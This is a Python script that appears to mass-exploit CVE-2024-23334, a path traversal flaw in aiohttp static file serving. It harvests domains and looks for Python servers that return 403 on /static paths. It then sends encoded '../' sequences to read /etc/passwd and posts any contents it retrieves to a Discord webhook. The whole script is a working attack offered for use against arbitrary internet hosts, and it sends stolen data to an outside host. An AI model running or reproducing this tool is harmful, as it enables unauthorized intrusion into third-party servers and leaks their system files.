import random
import httpx
import asyncio
import requests
from domain_collector import collect_domains
from urllib.parse import urlparse


# Settings
use_proxy = False
proxy_url = "http://127.0.0.1:8080"
discord_webhook = 'https://discord.com/api/webhooks/111111111111111111111/zzzzzzzzzzzzzzzzzzzzzzzzzzz_zzzzzzzzzzzzzzzzz_zzzzzzzzzzzzzzzzzzzzzz'


def create_host_header(url):
    parsed_url = urlparse(url)
    domain = parsed_url.netloc.split(':')[0]  # Extract domain
    port = parsed_url.port  # Extract port
    if port:
        return f"{domain}:{port}"
    else:
        return f"{domain}"


def send_discord(url, passwd):
    data = {
        "embeds": [
            {
                "title": "CVE-2024-23334",
                "color": 5639644,
                "fields": [
                    {
                        "name": url,
                        "value": passwd[:1000]
                    }
                ],
                "thumbnail": {
                    "url": "https://media1.tenor.com/m/KI2KjhUH6r8AAAAd/hacker-hack.gif"
                }
            }
        ],
        "username": "CVE-2024-23334",
        "avatar_url": "https://th.bing.com/th/id/OIG2.xjU4Hyt0QOk_vCqpa6df?w=1024&h=1024&rs=1&pid=ImgDetMain"
    }

    response = requests.post(discord_webhook, json=data)


async def check_static(domain, semaphore):
    urls = [f'http://{domain}/static', f'https://{domain}/static', f'http://{domain}:8080/static', f'https://{domain}:8080/static']
    async with httpx.AsyncClient(verify=False, proxies={"http://": proxy_url, "https://": proxy_url} if use_proxy else {}) as client:
        for url in urls:
            async with semaphore:
                try:
                    host_header = create_host_header(url)
                    headers = {'Host': host_header}
                    response = await client.get(url, headers=headers, timeout=5)
                    server_header = response.headers.get('Server')
                    if response.status_code == 403:
                        if "python" in server_header.lower():
                            print("Server Header:", server_header, "\n")
                            if 'forbidden' in response.text.lower():
                                await exp(domain=domain, url=url, semaphore=semaphore)
                except asyncio.TimeoutError:
                    print(f"Timeout occurred while checking {url}")
                except Exception as e:
                    # print(f"Exception occurred: {e}")
                    pass


async def exp(domain, url, semaphore):
    x = random.randint(5, 15)
    rand_relative_path = ''.join(['%2E%2E%2F' for _ in range(x)])
    headers = {'Host': domain}
    async with httpx.AsyncClient(verify=False, proxies={"http://": proxy_url, "https://": proxy_url} if use_proxy else {}) as client:
        async with semaphore:
            response = await client.get(f'{url}/{rand_relative_path}etc%2Fpasswd', headers=headers, timeout=5)
            if 'root:' in response.text:
                send_discord(url, response.text)
                print(response.text)


async def main():
    #domains = ['127.0.0.1:8888'] # Test Locally using evilServer.py
    domains = collect_domains(run_duration=20)
    print("Checking...")
    semaphore = asyncio.Semaphore(20)
    tasks = [check_static(domain, semaphore) for domain in domains]
    await asyncio.gather(*tasks)

asyncio.run(main())
